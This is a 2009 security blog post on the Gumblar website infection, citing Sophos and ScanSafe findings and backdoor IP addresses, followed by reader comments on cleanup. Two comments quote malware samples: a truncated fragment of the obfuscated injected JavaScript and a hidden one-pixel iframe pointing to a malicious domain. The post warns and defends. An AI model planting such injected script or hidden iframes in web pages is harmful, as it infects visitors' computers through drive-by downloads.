Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.

   15 May 09   Filed in General

The Gumblar exploit seems to be the biggest exploit I’ve ever reviewed in my blog. About a thousand visitors come to read my article about Gumblar every day. This exploit accounts for about 80% of positives on Unmask Parasites and I still don’t see any sign of its decline.

I found some more interesting facts about this exploit in SophosLab’s and ScanSafe’s blogs and would like to share them with you.

  • Sophos call the Gumblar JavaScript code “Troj/JSRedir-R“.
  • For Sophos, it is the most often detected threat this week (May 6-13). Check the graph.

“Troj/JSRedir-R accounts for some 42% of all malicious infections found on websites in the last seven days, massively overshadowing its nearest rival – Mal/Iframe-F – at 7%.

Sophos say that their products currently detect this exploit, however it may change any time (as it once did) and if your site is infected, you can help by sending infected files to them (details here)

ScanSafe also have a great Gumblar Q&A:

  • This exploit is a replacement of the previous version distributed from “94  .247 .2 .195
  • This trojan may change Google search results and redirect to other malicious sites.
  • It also installs a backdoor that connects to 78 .109 .29 .112. (Configure your firewall to block this IP)
  • Unlike other exploits that usually decline after the first week, the Gumblar compromises are still increasing.

Hope this information will make you more serious about your own PC security. Having penetrated your PC, hackers are one step closer to your site (and your business).

Scan both you local computer and your web site regularly.

Similar posts:

Reader's Comments (14)

  1. |

    Hi there !
    We’ve been attacked by this Gumblar sh*t today.
    We spent the day looking for some easy way to fix it, and stumbled upon your article.

    This was pretty helpful.

    My colleague developped a php script which scans a whole hosting and gives you a list of affected files (.php; .js; .html ..Etc)

    We just finished editing some 1000 files manually, and hopefully have removed every single trace of the Gumblar attack on our hostings.

    here is a link to a txt file containing the php script (Kudos to David):

    Hope this will help.
    (I’ll post an article on my blog tomorrow, ’cause now I’m kinda tired … ^_^)

    And success with the gumblar removal !


    • |

      We had gunblar affect our site as well. I’m starting to wonder if the issue is not a vulnerability in Joomla or some joomla component. Has anyone found the root cause of how their site got infected in the first place?

      Edit by Denis: I’ve removed your site from you signature since it is infected with both Gumblar and the malicious iframe.
      Unmask Parasites report.

      • |

        You should read the referenced articles carefully. They all say that compromised FTP credentials are to blame.

        • |

          Hey Denis,

          I read the articles and I know what you’re saying in terms of hacked FTP credentials

          It’s odd though, i have several sites on one host and only one was infected even though I had passwords for several others in my filezilla profile.

          In the end, I was forced to take down my site. because I had 539 infected files.

          I’m writing an app to go through the files and clean them. I haven’t seen anything like that out there as yet.

  2. |

    I wanted to ask how come that your tool for checking infected sites in
    mark certain websites as suspicious
    but when i look into the source code, i don’t see any of the injected script

  3. |


    I just want warn to everyone regarding “”. already removed A record from their DNS, it meant gumblar no longer resolved at this time.
    However, malicious attacker already replaced “” instead of gumblar, almost compromised site has been re-injected malicious code like this…

    var a=”ScriptEngine”,b=”Version()+”,j=””,u=navigator.userAgent;if((u.indexOf
    (“Chrome”)0)&&(u.indexOf(“NT 6″)<0)&&(document.cookie.indexOf(“miek=1″)<0)&&(typeof(zrvzts)!=typeof(“A”)))
    {zrvzts=”A”;eval(“if(window.”+a+”) j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);document.write(“{script

    It seems small changed that they want reject “Chrome”. I found several site that compromised but I can’t do anything because of my English is too poorly.

    Symantec already blocked due to Trojan Horse.

    Also these IPs are blacklisted by SBL.

    I wish attention earlier to stop spread this “martuz pandemic”.

  4. |

    Speaking of the new variant, I saw this iFrame injected all over my pages as well:

  5. |

    oops, this iframe that is:
    iframe src=”http ://niklejo .net/?click=2A909B” width=1 height=1 style=”visibility:hidden;position:absolute”>

  6. |

    […] Digg   Reddit   Email This By now you’ve probably heard about Gumblar, the cheeky little nastyware that uses injected Javascript to load complementary malware from a Web […]

  7. |


    we’ve already developed an application that scans for and removes pre-defined and/or any given malicious code from your files.

    currently it scans for 22 suspicious codes (possible threats – no action taken), and 25 virus definitions (actual viruses – file gets cleaned). and you have the option to add your own in both lists, so you will always stay up-to-date.

    please check it out here:

  8. |

    I cannot recommend


    Chris saved me from hours and hours of work with his Antivirus program to scan website directories!

    Again Thanks Chris!!!